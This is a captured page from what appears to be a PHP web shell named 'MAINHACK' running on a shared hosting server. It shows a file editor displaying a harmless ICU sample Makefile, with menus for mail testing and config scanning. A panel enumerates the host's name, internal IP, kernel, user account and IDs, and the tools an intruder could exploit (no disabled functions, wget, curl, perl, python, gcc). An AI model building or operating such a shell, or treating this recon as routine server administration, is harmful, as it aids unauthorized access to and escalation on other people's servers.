[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Makefile
File is not writable. Editing disabled.
# Copyright (C) 2016 and later: Unicode, Inc. and others. # License & terms of use: http://www.unicode.org/copyright.html#License # # Copyright (c) 2000-2012 IBM, Inc. and others # udata sample code # Usage: # - configure, build, install ICU # - ensure that 'icu-config' is in the PATH (PREFIX/bin/icu-config) # - if ICU is not built relative to this directory, # set the variable ICU_PATH to the 'icu' directory # (i.e. /foo/icu ) # - do 'make' in this directory # Include ICU standard definitions include ../defs.mk # look for the ICU_PATH variable, guess if not there ICU_DEFAULT_PATH=../../.. ifeq ($(strip $(ICU_PATH)),) ICU_PATH=$(ICU_DEFAULT_PATH) endif # Name of your target TARGET1=reader TARGET2=writer # All object files (C or C++) OBJECTS1=reader.o OBJECTS2=writer.o OBJECTS=$(OBJECTS1) $(OBJECTS2) CLEANFILES=*~ $(TARGET).out $(TARGET1).out $(TARGET2).out all: $(TARGET1) $(TARGET2) # The following lines are to make sure ICU_PATH is set properly. writer.o: $(ICU_PATH)/source/tools/toolutil/uoptions.h $(ICU_PATH)/source/tools/toolutil/uoptions.h: @echo @echo "*** Please read the directions at the top of this file (Makefile)" @echo "*** Can't open $@ - check ICU_PATH" @echo @false # Only the writer needs these, actually. CPPFLAGS += -I$(ICU_PATH)/source/tools/toolutil LDFLAGS += -L$(ICU_PATH)/source/tools/toolutil $(shell icu-config --ldflags-toolutil) .PHONY: all clean distclean check report distclean clean: -test -z "$(CLEANFILES)" || rm -f $(CLEANFILES) -$(RMV) $(OBJECTS) $(TARGET1) $(TARGET2) # Can change this to LINK.c if it is a C only program # Can add more libraries here. $(TARGET1): $(OBJECTS1) $(CXX) -o $@ $(LDFLAGS) $(TARGET2): $(OBJECTS2) $(CXX) -o $@ $(LDFLAGS) -licui18n -licuuc # Make check: simply runs the sample, logged to a file check: $(TARGET1) $(TARGET2) $(INVOKE) ./$(TARGET2) | tee $(TARGET2).out $(INVOKE) ./$(TARGET1) | tee $(TARGET1).out
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 690.99 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A